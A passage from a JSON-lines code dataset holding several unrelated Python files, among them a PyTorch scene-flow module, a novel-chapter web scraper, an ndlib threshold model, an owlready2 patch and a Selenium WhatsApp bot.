pose[:, :3] = 0.1 * pose[:, :3]\n\n mask = self.conv_mask(x_out)\n mask = torch.sigmoid(mask)\n \n return x_out, sf, disp1, pose, mask\n\nclass MonoSceneFlowPoseHourGlass(nn.Module):\n # def __init__(self, ch_in, hourglass):\n def __init__(self, ch_in):\n super(MonoSceneFlowPoseHourGlass, self).__init__()\n self.conv = conv(ch_in, 32, 1, 1, 1)\n # self.hourglass = hourglass\n\n def forward(self, x):\n x = self.conv(x)\n return x\n # # x = interpolate2d_as(x, x_full)\n # disp_dicts, flow_dicts, mask_dicts, pose, iconv1 = self.hourglass(x)\n # return iconv1, flow_dicts[\"1\"], disp_dicts[\"1\"], pose, mask_dicts[\"1\"]\n\n\nclass RigidFlowFromPose(nn.Module):\n def __init__(self, reg_depth):\n super(RigidFlowFromPose, self).__init__()\n\n self.reg_depth = reg_depth\n\n def forward(self, pose, disp, k_aug, aug_size):\n\n ### scale disp to pixel unit\n _, _, h_dp, w_dp = disp.size()\n\n ## scale alignment between input and current resolution (since it is coarse-to-fine)\n local_scale = torch.zeros_like(aug_size)\n local_scale[:, 0] = h_dp\n local_scale[:, 1] = w_dp \n\n if self.reg_depth:\n depth = disp\n pts, k_scale = pixel2pts_ms_from_depth(k_aug, depth, local_scale / aug_size)\n else:\n disp = disp * w_dp\n pts, k_scale, depth = pixel2pts_ms_and_depth(k_aug, disp, local_scale / aug_size)\n\n # pose = torch.zeros_like(pose)\n # pose[:, 5] = 1\n ### apply transform\n T = transformation_from_parameters(pose[:, :3].unsqueeze(1), pose[:, 3:].unsqueeze(1)) # pose is B*6, T is B*4*4\n R = T[:, :3, :3] # B*3*3\n t = T[:, :3, 3:] # B*3*1\n pts_flat = pts.flatten(start_dim=2) # B*3*N\n pts_transformed = torch.matmul(R, pts_flat) + t\n pts_transformed_grid = pts_transformed.reshape_as(pts)\n rigid_flow = pts_transformed_grid - pts\n\n return rigid_flow, depth, k_scale, R, t\n\n\nclass ContextNetwork(nn.Module):\n def __init__(self, ch_in, reg_depth):\n super(ContextNetwork, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128, 3, 1, 1),\n conv(128, 128, 3, 1, 2),\n conv(128, 128, 3, 1, 4),\n conv(128, 96, 3, 1, 8),\n conv(96, 64, 3, 1, 16),\n conv(64, 32, 3, 1, 1)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.reg_depth = reg_depth\n if self.reg_depth:\n self.conv_d1 = nn.Sequential(\n conv(32, 1, isReLU=False), \n torch.nn.Softplus()\n )\n else:\n self.conv_d1 = nn.Sequential(\n conv(32, 1, isReLU=False), \n torch.nn.Sigmoid()\n )\n\n def forward(self, x):\n\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n if self.reg_depth:\n d = self.conv_d1(x_out)\n d = d.clamp(min=1e-3, max=80)\n else:\n d = self.conv_d1(x_out) * 0.3\n\n return sf, d\n\nclass Flatten(nn.Module):\n ### in pytorch 1.2 there is not Flatten layer. In pytorch1.6 there is \n ### https://discuss.pytorch.org/t/flatten-layer-of-pytorch-build-by-sequential-container/5983\n def forward(self, x):\n return x.view(x.size(0), -1)\n\nclass Transpose(nn.Module):\n def __init__(self, dim0, dim1):\n super(Transpose, self).__init__()\n self.dim0 = dim0\n self.dim1 = dim1\n\n def forward(self, x):\n return x.transpose(self.dim0, self.dim1)\n\n\nclass SpatialPyramidPooling(nn.Module):\n \"\"\"Generate fixed length representation regardless of image dimensions\n Based on the paper \"Spatial Pyramid Pooling in Deep Convolutional Networks\n for Visual Recognition\" (https://arxiv.org/pdf/1406.4729.pdf)\n :param [int] num_pools: Number of pools to split each input feature map into.\n Each element must be a perfect square in order to equally divide the\n pools across the feature map. 
Default corresponds to the original\n paper's implementation\n :param str mode: Specifies the type of pooling, either max or avg\n See: \n https://github.com/addisonklinke/pytorch-architectures/blob/master/torcharch/modules/conv.py\n https://discuss.pytorch.org/t/elegant-implementation-of-spatial-pyramid-pooling-layer/831/2\n \"\"\"\n\n def __init__(self, num_pools=[1, 2, 4], mode='max'):\n super(SpatialPyramidPooling, self).__init__()\n self.name = 'SpatialPyramidPooling'\n if mode == 'max':\n pool_func = nn.AdaptiveMaxPool2d\n elif mode == 'avg':\n pool_func = nn.AdaptiveAvgPool2d\n else:\n raise NotImplementedError(f\"Unknown pooling mode '{mode}', expected 'max' or 'avg'\")\n self.pools = nn.ModuleList([])\n for p in num_pools:\n # self.pools.append( pool_func( (max(1,int(p/2)), int(p)) ) )\n self.pools.append( pool_func( (int(p), int(p)) ) )\n\n def forward(self, feature_maps):\n \"\"\"Pool feature maps at different bin levels and concatenate\n :param torch.tensor feature_maps: Arbitrarily shaped spatial and\n channel dimensions extracted from any generic convolutional\n architecture. Shape ``(N, C, H, W)``\n :return torch.tensor pooled: Concatenation of all pools with shape\n ``(N, C, sum(num_pools))``\n \"\"\"\n assert feature_maps.dim() == 4, 'Expected 4D input of (N, C, H, W)'\n batch_size = feature_maps.size(0)\n channels = feature_maps.size(1)\n pooled = []\n for p in self.pools:\n pooled.append(p(feature_maps).view(batch_size, channels, -1))\n return torch.cat(pooled, dim=2)\n\n\ndef transformation_from_parameters(axisangle, translation, invert=False):\n \"\"\"Convert the network's (axisangle, translation) output into a 4x4 matrix\n from Monodepth2\n \"\"\"\n R = rot_from_axisangle(axisangle)\n t = translation.clone()\n\n if invert:\n R = R.transpose(1, 2)\n t *= -1\n\n T = get_translation_matrix(t)\n\n if invert:\n M = torch.matmul(R, T)\n else:\n M = torch.matmul(T, R)\n\n return M\n\ndef rot_from_axisangle(vec):\n \"\"\"Convert an axisangle rotation into a 4x4 transformation matrix\n (adapted from https://github.com/Wallacoloo/printipi)\n Input 'vec' has to be Bx1x3\n \"\"\"\n angle = torch.norm(vec, 2, 2, True)\n axis = vec / (angle + 1e-7)\n\n ca = torch.cos(angle)\n sa = torch.sin(angle)\n C = 1 - ca\n\n x = axis[..., 0].unsqueeze(1)\n y = axis[..., 1].unsqueeze(1)\n z = axis[..., 2].unsqueeze(1)\n\n xs = x * sa\n ys = y * sa\n zs = z * sa\n xC = x * C\n yC = y * C\n zC = z * C\n xyC = x * yC\n yzC = y * zC\n zxC = z * xC\n\n rot = torch.zeros((vec.shape[0], 4, 4)).to(device=vec.device)\n\n rot[:, 0, 0] = torch.squeeze(x * xC + ca)\n rot[:, 0, 1] = torch.squeeze(xyC - zs)\n rot[:, 0, 2] = torch.squeeze(zxC + ys)\n rot[:, 1, 0] = torch.squeeze(xyC + zs)\n rot[:, 1, 1] = torch.squeeze(y * yC + ca)\n rot[:, 1, 2] = torch.squeeze(yzC - xs)\n rot[:, 2, 0] = torch.squeeze(zxC - ys)\n rot[:, 2, 1] = torch.squeeze(yzC + xs)\n rot[:, 2, 2] = torch.squeeze(z * zC + ca)\n rot[:, 3, 3] = 1\n\n return rot\n\n\ndef get_translation_matrix(translation_vector):\n \"\"\"Convert a translation vector into a 4x4 transformation matrix\n \"\"\"\n T = torch.zeros(translation_vector.shape[0], 4, 4).to(device=translation_vector.device)\n\n t = translation_vector.contiguous().view(-1, 3, 1)\n\n T[:, 0, 0] = 1\n T[:, 1, 1] = 1\n T[:, 2, 2] = 1\n T[:, 3, 3] = 1\n T[:, :3, 3, None] = t\n\n return T\n\n\ndef uvd2xyz(flow_uvd, disp, k1, input_size):\n \"\"\"flow_uvd: 3 channel grid of du, dv, ddisp\"\"\"\n ### uv1_grid, xy1_grid, xyz_0\n\n _, _, h_x, w_x = flow_uvd.size()\n local_scale = 
torch.zeros_like(input_size)\n local_scale[:, 0] = h_x\n local_scale[:, 1] = w_x\n\n disp = interpolate2d_as(disp, flow_uvd) * w_x\n pts1, k1_scale, uv1_grid = pixel2pts_ms_and_uv1grid(k1, disp, local_scale / input_size)\n\n ### uv1_grid_flowed\n flow_uvd_pixel = flow_uvd * w_x\n flow_uv_pixel = flow_uvd_pixel[:, :2]\n uv_grid_flowed = uv1_grid[:, :2] + flow_uv_pixel\n uv1_grid_flowed = torch.cat([uv_grid_flowed, uv1_grid[:, [2]]], dim=1) # B*3*H*W\n \n ### xy1_grid_flowed\n disp_change = flow_uvd_pixel[:, [2]]\n disp_changed = disp + disp_change\n disp_changed = torch.clamp(disp_changed, min=1e-7)\n depth_changed = disp2depth_kitti(disp_changed, k1_scale[:, 0, 0])\n\n ### xyz_1\n depth_mat = depth_changed.flatten(2)\n pixel_mat = uv1_grid_flowed.flatten(2)\n pts_mat = torch.matmul(torch.inverse(k1_scale.cpu()).cuda(), pixel_mat) * depth_mat\n pts2 = pts_mat.reshape_as(uv1_grid_flowed)\n\n ### xyz_flow\n xyz_flow = pts2 - pts1\n\n return xyz_flow\n\ndef xyz2uvd(flow_xyz, disp, k1, input_size):\n\n _, _, h_x, w_x = flow_xyz.size()\n local_scale = torch.zeros_like(input_size)\n local_scale[:, 0] = h_x\n local_scale[:, 1] = w_x\n\n disp = interpolate2d_as(disp, flow_xyz) * w_x\n pts1, k1_scale, uv1_grid = pixel2pts_ms_and_uv1grid(k1, disp, local_scale / input_size)\n pts2 = pts1 + flow_xyz\n\n uvz2 = torch.matmul(k1_scale, pts2.flatten(2)).reshape_as(pts2)\n uv2 = uvz2[:, :2] / torch.clamp(uvz2[:, [2]], min=1e-3)\n ### or \n # uv2 = pts2pixel(pts2, k1_scale)\n\n uv_flow = uv2 - uv1_grid[:, :2]\n\n depth2 = torch.clamp(pts2[:, [2]], min=1e-3)\n disp2 = depth2disp_kitti(depth2, k1_scale[:, 0, 0])\n\n d_flow = disp2 - disp\n\n uvd_flow_pixel = torch.cat([uv_flow, d_flow], dim=1)\n uvd_flow_normalized = uvd_flow_pixel / w_x\n\n return uvd_flow_normalized\n","sub_path":"models/modules_sceneflow.py","file_name":"modules_sceneflow.py","file_ext":"py","file_size_in_byte":23360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"205557506","text":"import random \n\nsaldo = 100\n\n\nwhile saldo > 0:\n print (saldo)\n aposta = float(input('Quanto você aposta?'))\n resp = input('A aposta é um número ou paridade?')\n \n if aposta == 0:\n break\n \n if resp == 'n':\n num = int(input('Digite o número'))\n if num == random.randint(0,36):\n saldo += aposta*num\n else:\n saldo -= aposta\n \n if resp == 'p':\n num = random.randint(0,36)\n p_i = input('O número é par ou impar?')\n if random.randint(0,36) % 2 == 0:\n resposta = 'p' \n else:\n resposta = 'i'\n if p_i == resposta:\n saldo += aposta\n else:\n saldo -= aposta\n \n ","sub_path":"backup/user_382/ch120_2020_03_30_20_04_15_503064.py","file_name":"ch120_2020_03_30_20_04_15_503064.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"542461155","text":"import requests\r\nfrom lxml import html\r\nimport os\r\netree=html.etree\r\nheaders={ \"User-Agent\":\"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36\"}\r\nurl=\"http://www.jinyongwang.com/book/\"\r\nres=requests.get(url,headers=headers)\r\nresult=res.content.decode(\"utf8\")\r\nhtml_result=etree.HTML(result)\r\nh2s=html_result.xpath(\"//h2[@class='bookname']/span[contains(text(),'修订版')]\")[0]\r\nul=h2s.xpath(\"../following-sibling::ul[1]/li\")\r\nfor li in ul:\r\n p_title=li.xpath(\"./p[@class='title']/a/text()\")[0]\r\n p_href=li.xpath(\"./p[@class='title']/a/@href\")[0]\r\n 
os.makedirs(\"./book/\"+str(p_title))\r\n url2=\"http://www.jinyongwang.com\"+p_href\r\n print(url2)\r\n res2=requests.get(url2,headers=headers)\r\n result2=res2.content.decode(\"utf8\")\r\n html_result2=etree.HTML(result2)\r\n lis=html_result2.xpath(\"//ul[@class='mlist']/li\")\r\n for li_text in lis:\r\n sub_title=li_text.xpath(\"./a/text()\")[0]\r\n print(sub_title)\r\n sub_href=li_text.xpath(\"./a/@href\")[0]\r\n print(\"http://www.jinyongwang.com\"+sub_href)\r\n res3=requests.get(\"http://www.jinyongwang.com\"+sub_href,headers=headers)\r\n result3=res3.content.decode(\"utf8\")\r\n with open(\"test.html\",\"w\",encoding=\"utf8\") as f:\r\n f.write(result3)\r\n html_result3=etree.HTML(result3)\r\n result_content=html_result3.xpath(\"//div[@class='vcon']\")[0]\r\n print(result_content)\r\n ps=result_content.xpath(\"./p/text()\")\r\n str_content=\"\"\r\n for p1 in ps:\r\n str_content+=p1+\"\\n\"\r\n with open(\"book/\"+str(p_title)+\"/\"+str(sub_title)+\".txt\",\"w\",encoding=\"utf8\") as f:\r\n f.write(str_content)\r\n\r\n #hrefs=li.xpath(\"//p[@class='title']/a/@href\")\r\n #print(hrefs)","sub_path":"tst_jin.py","file_name":"tst_jin.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"96472969","text":"from ..DiffusionModel import DiffusionModel\nimport networkx as nx\nimport numpy as np\nfrom scipy import stats\n\n__author__ = \"Letizia Milli\"\n__email__ = \"letizia.milli@di.unipi.it\"\n\n\nclass KerteszThresholdModel(DiffusionModel):\n \"\"\"\n Implements the blocked-nodes threshold model by Karsai et al.\n Model Parameters:\n (1) list of blocked nodes\n (2) exogenous adopter rate\n (3) node thresholds\n \"\"\"\n\n def __init__(self, graph):\n super(self.__class__, self).__init__(graph)\n self.available_statuses = {\n \"Susceptible\": 0,\n \"Infected\": 1,\n \"Blocked\": -1\n }\n\n self.parameters = {\n \"model\": {\n \"adopter_rate\": {\n \"descr\": \"Exogenous adoption rate\",\n \"range\": [0, 1],\n \"optional\": True,\n \"default\": 0\n },\n \"percentage_blocked\": {\n \"descr\": \"Percentage of blocked nodes\",\n \"range\": [0, 1],\n \"optional\": True,\n \"default\": 0.1\n }\n },\n \"nodes\": {\n \"threshold\": {\n \"descr\": \"Node threshold\",\n \"range\": [0, 1],\n \"optional\": True,\n \"default\": 0.1\n }\n },\n \"edges\": {},\n }\n\n self.name = \"Kertesz Threhold\"\n\n def iteration(self):\n \"\"\"\n\n \"\"\"\n self.clean_initial_status(self.available_statuses.values())\n actual_status = {node: nstatus for node, nstatus in self.status.iteritems()}\n\n if self.actual_iteration == 0:\n if min(actual_status.values()) == 0:\n number_node_blocked = int(float(self.graph.number_of_nodes()) *\n float(self.params['model']['percentage_blocked']))\n\n i = 0\n while i < number_node_blocked:\n # select a random node\n node = self.graph.nodes()[np.random.randint(0, self.graph.number_of_nodes())]\n\n # node not infected\n if actual_status[node] == 0:\n\n # node blocked\n actual_status[node] = -1\n self.status[node] = -1\n i += 1\n\n self.actual_iteration += 1\n return 0, actual_status\n\n for node in self.graph.nodes():\n if self.status[node] == 0:\n if self.params['model']['adopter_rate'] > 0:\n xk = (0, 1)\n pk = (1-self.params['model']['adopter_rate'], self.params['model']['adopter_rate'])\n probability = stats.rv_discrete(name='probability', values=(xk, pk))\n number_probability = probability.rvs()\n\n if number_probability == 1:\n actual_status[node] = 1\n continue\n\n neighbors = 
self.graph.neighbors(node)\n if len(neighbors) == 0:\n continue\n\n if isinstance(self.graph, nx.DiGraph):\n neighbors = self.graph.predecessors(node)\n\n infected = 0\n for v in neighbors:\n infected += self.status[v]\n\n infected_ratio = float(infected)/len(neighbors)\n if infected_ratio >= self.params['nodes']['threshold'][node]:\n actual_status[node] = 1\n\n delta = self.status_delta(actual_status)\n self.status = actual_status\n self.actual_iteration += 1\n\n return self.actual_iteration-1, delta\n","sub_path":"ndlib/models/epidemics/KerteszThresholdModel.py","file_name":"KerteszThresholdModel.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"461095986","text":"from __future__ import print_function\nimport sys\n\nfrom Ziggeo import Ziggeo\n\nif(len(sys.argv) < 4):\n print (\"Error\\n\")\n print (\"Usage: $>python webhooks_delete.py YOUR_API_TOKEN YOUR_PRIVATE_KEY WEBHOOK_URL \\n\")\n print (\"Example: $>python webhooks_delete.py 1234567890abcdef 1234567890abcdef http://yoursite.com \\n\")\n sys.exit()\n\napi_token = sys.argv[1]\nprivate_key = sys.argv[2]\ntarget_url = sys.argv[3]\n\nziggeo = Ziggeo(api_token, private_key)\n\narguments = {}\narguments['target_url'] = target_url\n\nziggeo.webhooks().delete(arguments)","sub_path":"demos/webhooks_delete.py","file_name":"webhooks_delete.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"316528602","text":"# -*- coding: utf-8 -*-\n\"\"\"This module injects some additional methods into owlready2 classes.\"\"\"\nimport types\n\nimport owlready2\nfrom owlready2 import ThingClass, PropertyClass, Thing, Restriction, Namespace\nfrom owlready2 import Metadata\n\n\n# Improve default rendering of entities\ndef render_func(entity):\n if hasattr(entity, 'prefLabel') and entity.prefLabel:\n name = entity.prefLabel[0]\n elif hasattr(entity, 'label') and entity.label:\n name = entity.label[0]\n elif hasattr(entity, 'altLabel') and entity.altLabel:\n name = entity.altLabel[0]\n else:\n name = entity.name\n return \"%s.%s\" % (entity.namespace.name, name)\n\n\nowlready2.set_render_func(render_func)\n\n\n#\n# Extending ThingClass (classes)\n# ==============================\ndef get_preferred_label(self):\n \"\"\"Returns the preferred label as a string (not list).\n\n The following heuristics is used:\n - if prefLabel annotation property exists, returns the first prefLabel\n - if label annotation property exists, returns the first label\n - otherwise return the name\n \"\"\"\n if hasattr(self, 'prefLabel') and self.prefLabel:\n return self.prefLabel[0]\n elif hasattr(self, 'label') and self.label:\n return self.label.first()\n else:\n return self.name\n\n\ndef get_parents(self, strict=False):\n \"\"\"Returns a list of all parents. 
If `strict` is true, parents that are\n parents of other parents are excluded.\"\"\"\n if strict:\n s = self.get_parents()\n for e in s.copy():\n s.difference_update(e.ancestors(include_self=False))\n return s\n elif isinstance(self, ThingClass):\n return {cls for cls in self.is_a\n if isinstance(cls, ThingClass)}\n elif isinstance(self, owlready2.ObjectPropertyClass):\n return {cls for cls in self.is_a\n if isinstance(cls, owlready2.ObjectPropertyClass)}\n else:\n assert 0\n\n\ndef _dir(self):\n \"\"\"Extend in dir() listing of ontology classes.\"\"\"\n s = set(object.__dir__(self))\n props = self.namespace.world._props.keys()\n s.update(props)\n return sorted(s)\n\n\ndef get_class_annotations(self, all=False, imported=True):\n \"\"\"Returns a dict with non-empty annotations.\n\n If `all` is true, also annotations with no value are included.\n\n If `imported` is true, also include annotations defined in\n imported ontologies.\n \"\"\"\n onto = self.namespace.ontology\n d = {get_preferred_label(a): a._get_values_for_class(self)\n for a in onto.annotation_properties(imported=imported)}\n if all:\n return d\n else:\n return {k: v for k, v in d.items() if v}\n\n\ndef disjoint_with(self, reduce=False):\n \"\"\"Returns a generator with all classes that are disjoint with `self`.\n If `reduce` is true, all classes that are a descendant of another class\n will be excluded.\"\"\"\n if reduce:\n s = set(self.disjoint_with())\n for e in s.copy():\n s.difference_update(e.descendants(include_self=False))\n for e in s:\n yield e\n else:\n for d in self.disjoints():\n for e in d.entities:\n if e is not self:\n yield e\n\n\ndef get_indirect_is_a(self, skip_classes=True):\n \"\"\"Returns the set of all isSubclassOf relations of self and its\n ancestors. If `skip_classes` is true, indirect classes are not\n included in the returned set.\n \"\"\"\n s = set()\n for e in reversed(self.mro()):\n if hasattr(e, 'is_a'):\n if skip_classes:\n s.update(r for r in e.is_a\n if not isinstance(r, owlready2.ThingClass))\n else:\n s.update(e.is_a)\n s.update(self.is_a)\n return s\n\n\n# Inject methods into ThingClass\nsetattr(ThingClass, '__dir__', _dir)\nsetattr(ThingClass, 'get_preferred_label', get_preferred_label)\nsetattr(ThingClass, 'get_parents', get_parents)\nsetattr(ThingClass, 'get_annotations', get_class_annotations)\nsetattr(ThingClass, 'disjoint_with', disjoint_with)\nsetattr(ThingClass, 'get_indirect_is_a', get_indirect_is_a)\n\n\n#\n# Extending PropertyClass (properties)\n# ====================================\ndef get_property_annotations(self, all=False, imported=True):\n \"\"\"Returns a dict with non-empty property annotations.\n\n If `all` is true, also annotations with no value are included.\n\n If `imported` is true, also include annotations defined in\n imported ontologies.\n \"\"\"\n onto = self.namespace.ontology\n d = {get_preferred_label(a): a._get_values_for_class(self)\n for a in onto.annotation_properties(imported=imported)}\n if all:\n return d\n else:\n return {k: v for k, v in d.items() if v}\n\n\nsetattr(PropertyClass, 'get_preferred_label', get_preferred_label)\nsetattr(PropertyClass, 'get_parents', get_parents)\nsetattr(PropertyClass, 'get_annotations', get_property_annotations)\n\n\n#\n# Extending Thing (individuals)\n# =============================\ndef get_individual_annotations(self, all=False, imported=True):\n \"\"\"Returns a dict with non-empty individual annotations.\n\n If `all` is true, also annotations with no value are included.\n\n If `imported` is true, also include 
annotations defined in\n imported ontologies.\n \"\"\"\n onto = self.namespace.ontology\n d = {get_preferred_label(a): a._get_values_for_individual(self)\n for a in onto.annotation_properties(imported=imported)}\n if all:\n return d\n else:\n return {k: v for k, v in d.items() if v}\n\n\n# Method names for individuals must be different from method names for classes\ntype.__setattr__(Thing, 'get_preflabel', get_preferred_label)\ntype.__setattr__(Thing, 'get_individual_annotations',\n get_individual_annotations)\n\n\n#\n# Extending Restriction\n# =====================\ndef get_typename(self):\n return owlready2.class_construct._restriction_type_2_label[self.type]\n\n\nsetattr(Restriction, 'get_typename', get_typename)\n\n\n#\n# Extending Namespace\n# ===================\norig_namespace_init = Namespace.__init__\n\n\ndef namespace_init(self, world_or_ontology, base_iri, name=None):\n orig_namespace_init(self, world_or_ontology, base_iri, name)\n if self.name.endswith('.ttl'):\n self.name = self.name[:-4]\n\n\nsetattr(Namespace, '__init__', namespace_init)\n\n\n#\n# Extending Metadata\n# ==================\ndef keys(self):\n \"\"\"Return a generator over annotation property names associates\n with this ontology.\"\"\"\n ns = self.namespace\n for a in ns.annotation_properties():\n if ns._has_data_triple_spod(s=ns.storid, p=a.storid):\n yield a\n\n\ndef items(self):\n \"\"\"Return a generator over annotation property (name, value_list)\n pairs associates with this ontology.\"\"\"\n ns = self.namespace\n for a in ns.annotation_properties():\n if ns._has_data_triple_spod(s=ns.storid, p=a.storid):\n yield a, self.__getattr__(a.name)\n\n\ndef has(self, name):\n \"\"\"Returns true if `name`\"\"\"\n return name in set(self.keys())\n\n\ndef __contains__(self, name):\n return self.has(name)\n\n\ndef __iter__(self):\n return self.keys()\n\n\ndef __setattr__(self, attr, values):\n metadata__setattr__save(self, attr, values)\n # Make sure that __setattr__() also updates the triplestore\n lst = self.__dict__[attr]\n if lst:\n ns = self.namespace\n annot = {\n a.name: a for a in owlready2.AnnotationProperty.__subclasses__()}\n if attr in annot:\n prop = annot[attr]\n else:\n with ns.ontology:\n prop = types.new_class(attr, (owlready2.AnnotationProperty, ))\n o, d = owlready2.to_literal(lst[0])\n ns._set_data_triple_spod(ns.storid, prop.storid, o, d)\n for e in lst[1:]:\n o, d = owlready2.to_literal(e)\n ns._set_data_triple_spod(ns.storid, prop.storid, o, d)\n\n\ndef __repr__(self):\n s = ['Metadata(']\n for a, values in self.items():\n sep = '\\n' + ' ' * (len(a.name) + 4)\n s.append(' %s=[%s],' % (a.name, sep.join(repr(v) for v in values)))\n s.append(')')\n return '\\n'.join(s)\n\n\nmetadata__setattr__save = Metadata.__setattr__\nsetattr(Metadata, 'keys', keys)\nsetattr(Metadata, 'items', items)\nsetattr(Metadata, 'has', has)\nsetattr(Metadata, '__contains__', __contains__)\nsetattr(Metadata, '__iter__', __iter__)\nsetattr(Metadata, '__setattr__', __setattr__)\nsetattr(Metadata, '__repr__', __repr__)\nMetadata.__getitem__ = Metadata.__getattr__\nMetadata.__setitem__ = Metadata.__setattr__\n","sub_path":"emmo/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":8496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"287461841","text":"'''\nYou left your computer unlocked and your friend decided to troll you by copying a lot of your files to random spots all over your file system.\nEven worse, she saved the duplicate files with random, 
embarrassing names (\"this_is_like_a_digital_wedgie.txt\" was clever, I'll give her that).\n\nWrite a function that returns a list of all the duplicate files. \nWe'll check them by hand before actually deleting them, since programmatically deleting files is really scary. \nTo help us confirm that two files are actually duplicates, return a list of tuples where:\n\n- the first item is the duplicate file\n- the second item is the original file\n\nFor example:\n\n [('/tmp/parker_is_dumb.mpg', '/home/parker/secret_puppy_dance.mpg'),\n ('/home/trololol.mov', '/etc/apache2/httpd.conf')]\n\nYou can assume each file was only duplicated once.\n'''\n\nimport os\n\ndef list_duplicate_files():\n '''\n returns a list of tuples where the first entry is the duplicate file\n and the second entry is the original\n '''\n return \n\n\n# http://stackoverflow.com/questions/2212643/python-recursive-folder-read\n# os.path.join(mypath, f)\n# https://www.interviewcake.com/question/python/find-duplicate-files\ndef list_all_files(path, results):\n\n if os.path.isdir(path):\n files = os.listdir(path)\n\n for f in files:\n full_path = os.path.join(path, f)\n if os.path.isdir(full_path):\n list_all_files(full_path, results)\n\n elif os.path.isfile(full_path):\n results[full_path] += 1\n elif os.path.isfile(path):\n results[path] += 1\n return results\n\nfrom collections import defaultdict\nA = defaultdict(int)\nresults = list_all_files('/Users/bcutrell/kata', A)\nprint(results)\n \n\n\n","sub_path":"cake/find_duplicate_files.py","file_name":"find_duplicate_files.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"391993972","text":"from selenium import webdriver\nimport os\nfrom time import sleep\n\n\nclass zapbot:\n # O local de execução do nosso script\n dir_path = os.getcwd()\n # O caminho do chromedriver\n chromedriver = os.path.join(dir_path, \"chromedriver.exe\")\n # Caminho onde será criada pasta profile\n profile = os.path.join(dir_path, \"profile\", \"wpp\")\n\n def __init__(self):\n self.options = webdriver.ChromeOptions()\n # Configurando a pasta profile, para mantermos os dados da seção\n self.options.add_argument(\n r\"user-data-dir={}\".format(self.profile))\n # Inicializa o webdriver\n self.driver = webdriver.Chrome(\n self.chromedriver, chrome_options=self.options)\n # Abre o whatsappweb\n self.driver.get(\"https://web.whatsapp.com/\")\n # Aguarda alguns segundos para validação manual do QrCode\n self.driver.implicitly_wait(15)\n\n def ultima_msg(self):\n \"\"\" Captura a ultima mensagem da conversa \"\"\"\n try:\n post = self.driver.find_elements_by_class_name(\"_3_7SH\")\n ultimo = len(post) - 1\n # O texto da ultima mensagem\n texto = post[ultimo].find_element_by_css_selector(\n \"span.selectable-text\").text\n return texto\n except Exception as e:\n print(\"Erro ao ler msg, tentando novamente!\")\n\n def envia_msg(self, msg):\n \"\"\" Envia uma mensagem para a conversa aberta \"\"\"\n try:\n sleep(2)\n # Seleciona acaixa de mensagem\n self.caixa_de_mensagem = self.driver.find_element_by_class_name(\"_2S1VP\")\n # Digita a mensagem\n self.caixa_de_mensagem.send_keys(msg)\n sleep(1)\n # Seleciona botão enviar\n self.botao_enviar = self.driver.find_element_by_class_name(\"_35EW6\")\n # Envia msg\n self.botao_enviar.click()\n sleep(2)\n except Exception as e:\n print(\"Erro ao enviar msg\", e)\n\n def envia_media(self, fileToSend):\n \"\"\" Envia media \"\"\"\n try:\n # Clica no botão adicionar\n 
self.driver.find_element_by_css_selector(\"span[data-icon='clip']\").click()\n # Seleciona input\n attach = self.driver.find_element_by_css_selector(\"input[type='file']\")\n # Adiciona arquivo\n attach.send_keys(fileToSend)\n sleep(3)\n # Seleciona botão enviar\n send = self.driver.find_element_by_xpath(\"//div[contains(@class, 'yavlE')]\")\n # Clica no botão enviar\n send.click()\n except Exception as e:\n print(\"Erro ao enviar media\", e)\n\n def abre_conversa(self, contato):\n \"\"\" Abre a conversa com um contato especifico \"\"\"\n try:\n # Seleciona a caixa de pesquisa de conversa\n self.caixa_de_pesquisa = self.driver.find_element_by_class_name(\"jN-F5\")\n # Digita o nome ou numero do contato\n self.caixa_de_pesquisa.send_keys(contato)\n sleep(2)\n # Seleciona o contato\n self.contato = self.driver.find_element_by_xpath(\"//span[@title = '{}']\".format(contato))\n # Entra na conversa\n self.contato.click()\n except Exception as e:\n raise e\n\n\nbot = zapbot()\nbot.abre_conversa(\"+55 11 99999-9999\")\nbot.envia_msg(\"Olá, sou o bot whatsapp! Para receber ajuda digite: /help\")\nimagem = bot.dir_path + \"/imagem.jpg\"\nmsg = \"\"\nwhile msg != \"/quit\":\n sleep(1)\n msg = bot.ultima_msg()\n if msg == \"/help\":\n bot.envia_msg(\"\"\"Bot: Esse é um texto com os comandos válidos:\n /help (para ajuda)\n /mais (para saber mais)\n /quit (para sair)\n \"\"\")\n elif msg == \"/mais\":\n bot.envia_media(imagem)\n elif msg == \"/quit\":\n bot.envia_msg(\"Bye bye!\")\n","sub_path":"whats_bot.py","file_name":"whats_bot.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"475873859","text":"#!/usr/bin/env python\n\nimport fcntl\nimport os\nimport sys\nimport termios\n\nimport trollius\nfrom trollius import From\n\n\ndef keybindings(ch):\n return {\n }.get(ch, lambda: None)\n\n\ndef process_keys():\n key = sys.stdin.read(1)\n print(\"{} pressed\".format(key))\n if key == 'Q':\n loop.stop()\n\nfd = sys.stdin.fileno()\noldterm = termios.tcgetattr(fd)\nnewattr = termios.tcgetattr(fd)\nnewattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO\ntermios.tcsetattr(fd, termios.TCSANOW, newattr)\noldflags = fcntl.fcntl(fd, fcntl.F_GETFL)\nfcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)\n\n\nloop = 